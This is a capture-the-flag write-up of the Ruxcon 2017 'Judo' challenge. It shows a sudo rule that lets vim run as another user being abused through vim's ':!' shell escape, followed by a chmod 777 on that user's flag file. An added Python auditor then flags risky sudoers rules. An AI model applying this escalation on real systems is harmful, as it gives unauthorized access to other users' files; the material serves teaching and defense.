This is my write-up for the first Unix challenge at the Ruxcon 2017 security conference capture the flag (CTF).
The challenge was called ‘Judo’ and was worth 100 points.
Upon SSHing to the provided IP address as the jimbob user, we can see that there is one other user called kungfu-steve.
    jimbob@judo-8w844:~$ cat /etc/passwd
    jimbob:x:1000:1000:,,,:/home/jimbob:/usr/bin/mon
    kungfu-steve:x:999:999:,,,:/home/kungfu-steve:/bin/bash

Looking inside this user’s home directory, we can see document.txt, which is owned by kungfu-steve and which jimbob cannot read (its mode is ----------).

    jimbob@judo-8w844:~$ ls -la /home/kungfu-steve/
    total 24
    drwxr-xr-x  2 kungfu-steve kungfu-steve 4096 Sep 14 05:44 .
    drwxr-xr-x  1 root         root         4096 Sep 14 05:44 ..
    -rw-r--r-- 19 kungfu-steve kungfu-steve  220 Aug 29 23:36 .bash_logout
    -rw-r--r-- 19 kungfu-steve kungfu-steve 3771 Aug 29 23:36 .bashrc
    -rw-r--r-- 19 kungfu-steve kungfu-steve  655 Aug 29 23:36 .profile
    ----------  1 kungfu-steve kungfu-steve   43 Sep 14 05:44 document.txt
As this looks suspiciously like our flag, I figure we need to somehow become kungfu-steve to read the file.
After trying many things I eventually looked at the /etc/sudoers file, which included the following:
    jimbob@judo-dz864:~$ cat /etc/sudoers
    jimbob ALL=(kungfu-steve) /usr/bin/vim
This basically says that the jimbob user can run vim as kungfu-steve. Using the sudo command shown below, I run vim.
    jimbob@judo-8w844:~$ sudo -S -u kungfu-steve /usr/bin/vim
    sudo: unable to resolve host judo-8w844
    [sudo] password for jimbob:
Within vim we can run commands by prefixing them with a !, as shown below.
    :!id
    uid=999(kungfu-steve) gid=999(kungfu-steve) groups=999(kungfu-steve)
This confirms that we’re running commands as kungfu-steve, as we’re running vim as this user.
I then simply run the below command through vim so that our jimbob user, and anyone else for that matter, can now read the document.txt file.

    :!chmod 777 /home/kungfu-steve/document.txt
The file can now be read by any user.
    jimbob@judo-dz864:/home/kungfu-steve$ ls -la
    -rwxrwxrwx 1 kungfu-steve kungfu-steve 43 Sep 14 05:44 document.txt
    jimbob@judo-dz864:/home/kungfu-steve$ cat document.txt
    Flag{766150e4-83aa-11e6-be47-57c3ba62c51c}
We can now read the contents of the document.txt file as the jimbob user, which contains our flag string.
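From the defender's side, the sudoers rule above is the kind of entry worth catching in a configuration review. The following is an added example, not part of the original write-up: a small auditor that flags sudoers rules granting a program that can run other commands from inside its own interface, unless the rule carries sudo's NOEXEC tag. The program list, the simplified grammar (no alias resolution) and the sample rules other than the jimbob/vim line are assumptions made for the example.

```python
import os
import re

# Assumed list for this example: programs that can run other commands from
# inside their own interface (vim's ":!" is the case in this write-up).
ESCAPE_CAPABLE = {"vim", "vi", "view", "ed", "less", "more", "man"}

# Simplified user specification: user host = (runas) commands; aliases not resolved.
SPEC = re.compile(r"^(\S+)\s+[^=\s]+\s*=\s*(?:\(([^)]*)\)\s*)?(.+)$")
TAG = re.compile(r"^([A-Z_]+):\s*")
SKIP = ("Defaults", "User_Alias", "Runas_Alias", "Host_Alias", "Cmnd_Alias")

def audit_sudoers(text):
    """Return (line number, user, run-as user, program) for each rule that
    grants an escape-capable program without the NOEXEC tag."""
    findings = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.split("#", 1)[0].strip()   # drop comments and #include lines
        match = SPEC.match(line)
        if not match or line.startswith(SKIP):
            continue
        user, runas, commands = match.group(1), match.group(2) or "root", match.group(3)
        noexec = False                        # tags carry over to later commands on the line
        for cmd in commands.split(","):
            cmd = cmd.strip()
            while (tag := TAG.match(cmd)):    # strip NOPASSWD:, NOEXEC:, etc.
                if tag.group(1) in ("NOEXEC", "EXEC"):
                    noexec = tag.group(1) == "NOEXEC"
                cmd = cmd[tag.end():]
            program = cmd.split()[0] if cmd else ""
            if os.path.basename(program) in ESCAPE_CAPABLE and not noexec:
                findings.append((lineno, user, runas, program))
    return findings

# Constructed sample: line 2 is the rule from the write-up, the rest are made up.
SAMPLE = """\
# constructed sudoers fragment for the example
jimbob ALL=(kungfu-steve) /usr/bin/vim
jimbob ALL=(kungfu-steve) NOEXEC: /usr/bin/vim
jimbob ALL=(kungfu-steve) sudoedit /home/kungfu-steve/notes.txt
alice  ALL=(root) NOPASSWD: /usr/bin/less /var/log/syslog, /usr/bin/id
"""

if __name__ == "__main__":
    for lineno, user, runas, program in audit_sudoers(SAMPLE):
        print(f"line {lineno}: {user} may run {program} as {runas} without NOEXEC")
```

NOEXEC only stops the granted program from executing further commands; an editor run this way can still read and write files as the target user, so granting sudoedit on specific files is the tighter option when editing is all that is needed.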